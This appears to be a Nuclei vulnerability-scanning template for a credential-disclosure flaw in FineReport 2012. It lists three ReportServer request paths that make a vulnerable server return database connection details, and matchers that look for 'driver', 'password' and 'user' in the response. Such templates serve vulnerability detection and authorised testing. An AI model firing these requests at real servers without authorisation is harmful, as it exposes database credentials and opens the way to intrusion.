id: frServer-leakage

info:
  name: 帆软报表 2012 信息泄露漏洞
  author: str1am
  severity: high
  reference:
    - https://github.com/govbk/WIKI-POC-EXP/blob/7d1194429dab9f9dd8139408e79b70ddb41a468f/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%202012%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
  tags: fanran

requests:
  - method: GET
    path:
      - "{{BaseURL}}/ReportServer?op=fr_server&cmd=sc_getconnectioninfo"
      - "{{BaseURL}}/seeyonreport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo"
      - "{{BaseURL}}/WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "driver"
          - "password"
          - "user"
        part: body
        condition: and
